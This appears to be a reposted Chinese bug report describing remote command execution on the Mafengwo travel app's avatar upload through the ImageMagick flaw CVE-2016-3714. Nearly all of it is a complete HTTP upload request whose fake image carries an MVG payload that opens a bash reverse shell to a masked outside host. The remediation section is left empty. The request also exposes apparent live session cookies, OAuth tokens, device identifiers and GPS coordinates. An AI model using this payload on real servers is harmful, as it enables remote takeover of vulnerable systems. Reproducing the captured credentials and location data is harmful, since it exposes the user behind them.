马蜂窝某站远程命令执行
程序员文章站
2022-04-07 16:12:13
目标:蚂蜂窝IOS APP
头像上传地方存在CVE-2016-3714 - ImageMagick 命令执行分析
POST https://m.mafengwo.c...
目标:蚂蜂窝IOS APP
头像上传地方存在CVE-2016-3714 - ImageMagick 命令执行分析
POST https://m.mafengwo.cn/nb/public/xauth_change_user.php HTTP/1.1 Host: m.mafengwo.cn Content-Type: multipart/form-data; boundary=Boundary+454EDE5BD920AC77 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ge39jptbg3r1hujdm9bhgqps55; __idfa=564443CC-9189-42C1-9CC9-0922116AD5C4; __idfv=CA34ED38-8E5B-4526-ADC2-201F233A5707; __mfwuuid=a811fb2e-75d5-fbb3-07c4-23a20157abf8; __openudid=34c68951fec87de860a9802862152f33442f8c37; mfw_uid=91729966; mfw_uuid=572b4a14-f864-0900-2f51-39ea5fc6ed2c; oad_n=a%3A3%3A%7Bs%3A3%3A%22oid%22%3Bi%3A2581%3Bs%3A2%3A%22dm%22%3Bs%3A13%3A%22m.mafengwo.cn%22%3Bs%3A2%3A%22ft%22%3Bs%3A19%3A%222016-05-05+21%3A26%3A44%22%3B%7D Connection: keep-alive Proxy-Connection: keep-alive Accept: */* User-Agent: TravelGuideMdd/7.4.4 (iPhone; iOS 9.3.1; Scale/2.00),Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 mfwappcode/cn.mafengwo.www mfwappver/7.4.4 mfwsdk/20160401 mfwjssdk/0.1 Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9 Content-Length: 2731 Accept-Webp: 1 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="app_code" cn.mafengwo.www --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="app_ver" 7.4.4 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="channel_id" App Store --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="device_token" 95d871b76de2867dc8723af43a258c990fc6c6f5a565fccc20410adcd4e73f23 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="device_type" ios --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="hardware_model" iPhone8,1 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="idfa" 564443CC-9189-42C1-9CC9-0922116AD5C4 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="idfv" CA34ED38-8E5B-4526-ADC2-201F233A5707 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="mfwsdk_ver" 20160401 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="o_lat" 22.614055 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="o_lng" 114.035890 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_consumer_key" 4 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_nonce" 841a666f5d33a774deab83527c05188c --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_signature" eL4MWstOj/x9mADziX8rlQHsgA0= --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_signature_method" HMAC-SHA1 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_timestamp" 1462455168 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_token" 91729966_778cee2f668645fee3e66a124d659eae --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="oauth_version" 1.0 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="open_udid" 34c68951fec87de860a9802862152f33442f8c37 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="screen_scale" 2 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="sys_ver" 9.3.1 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="time_offset" 480 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="uid" 91729966 --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="x_auth_mode" client_auth --Boundary+454EDE5BD920AC77 Content-Disposition: form-data; name="ulogo"; filename="ulogo" Content-Type: image/jpeg push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2015 0>&1")' pop graphic-context --Boundary+454EDE5BD920AC77--
反弹shell
解决方案:
请多指教~
上一篇: Webgoat学习笔记之习题破解
下一篇: 杜绝入侵:八大法则防范ASP网站漏洞